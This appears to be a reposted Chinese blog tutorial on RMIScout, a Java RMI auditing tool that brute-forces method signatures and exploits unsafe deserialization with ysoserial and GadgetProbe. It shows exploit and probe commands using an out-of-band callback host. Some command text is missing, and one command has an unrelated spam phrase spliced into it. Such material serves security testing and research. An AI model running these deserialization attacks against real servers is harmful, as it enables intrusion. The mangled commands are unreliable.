RMIScout怎么使用


这篇文章主要介绍“RMIScout怎么使用”,在日常操作中,相信很多人在RMIScout怎么使用问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”RMIScout怎么使用”的疑惑有所帮助!接下来,请跟着小编一起来学习吧!RMIScout是一款针对Java RMI的安全审计工具,该工具可以使用字典和爆破策略来枚举Java RMI功能,并利用其中潜在的RMI参数解集(Unmarshalling)漏洞。实际上,RMIScout能够针对Java RMI接口执行基于字典的暴力破解攻击,并在不需要调用任何其他方法的情况下安全地猜测方法签名。在一台存在错误配置的服务器中,任何已知的RMI签名都会使用non-primitive类型,比如说java.lang.String,而在这种情况下,攻击者将能够可通过将对象转换为序列化的Payload来利用此漏洞。这种错误配置非常常见,比如说,VMWare vSphere Data Protection + vRealize Operations Manager、Pivotal tc Server and Gemfire和Apache Karaf + Cassandra等等。RMIScout整合ysoserialGadgetProbe将可以针对错误配置进程范围序列化筛选器(JEP 290)的服务执行反序列化攻击。1、提供字典和基于文本的爆破策略,而不是对64位方法哈希进行爆破;2、在无需任何方法调用的情况下识别RMI方法;3、提供了一种简单的方法来利用已知的不安全RMI参数解集漏洞,并与ysoserial或Payload实现ysoserial.payloads.ObjectPayload集成;4、集成GadgetProbe来识别远程类,以帮助识别相关软件并构建gadget链;如需开始搜索,可参考工具自带的lists/prototypes.txt字典文件,该字典文件涵盖了超过15000种RMI原型。可在无需执行RMI函数的情况下对RMI方法进行识别,RMIScout使用了底层RMI网络功能和动态类生成方法来发送带有故意不匹配类型的RMI调用,以触发远程异常。所有参数都将替换为动态生成的可序列化类,该类的名称假定为255个字符,并且在远程类路径中不存在。比如说:如果目标类存在,那么将会触发一个由ClassNotFoundException发出的远程java.rmi.UnmarshalException异常或参数解集错误,整个过程无需调用底层方法。完整技术手册:【点我获取】广大研究人员可以使用下列命令将项目源码克隆至本地:针对远程RMI服务,使用函数原型字典执行基于字典的爆破攻击:使用方法字典和其他选项执行爆破攻击:根据特定的ysoserial Payload以及Payload参数来转换对象派生类型:./rmiscout.sh exploit -s 'void vulnSignature(java.lang.String a, int b)' 免费云主机域名-p ysoserial.payloads.URLDNS -c "http://examplesubdomain.burpcollaborator.net" -n registryName 使用GadgetProbe和已知签名对远程类路径执行爆破:./rmiscout.sh probe -s 'void vulnSignature(java.lang.String a, int b)' -i ../GadgetProbe/wordlists/maven_popular.list -d "examplesubdomain.burpcollaborator.net" -n registryName 使用包含的rmiscout.sh自动化对项目代码进行构建,其封装了java -jar语句:或者,你也可以手动构建项目源码,即使用传统的java -jar语句:运行RMI演示服务器,并使用demo/wordlist.txt字典文件:到此,关于“RMIScout怎么使用”的学习就结束了,希望能够解决大家的疑惑。理论与实践的搭配能更好的帮助大家学习,快去试试吧!若想继续学习更多相关知识,请继续关注云编程开发博客网站,小编会继续努力为大家带来更多实用的文章!

相关推荐: 15分钟快速入门Python套路!这7个案例值得一看

有人用Python从各大视频网站下视频,有人成功用Python跳一跳跳到4999,有人用Python撩妹子,还有人设计了一套代码自动抢红包… 俗话说外行看热闹,内行看门道,我们已经知道了python的火热情况,但是学一门编程语言是需要花大量精力的,所以我们…

免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。

(0)
打赏 微信扫一扫 微信扫一扫
上一篇 02/03 09:15
下一篇 02/03 09:15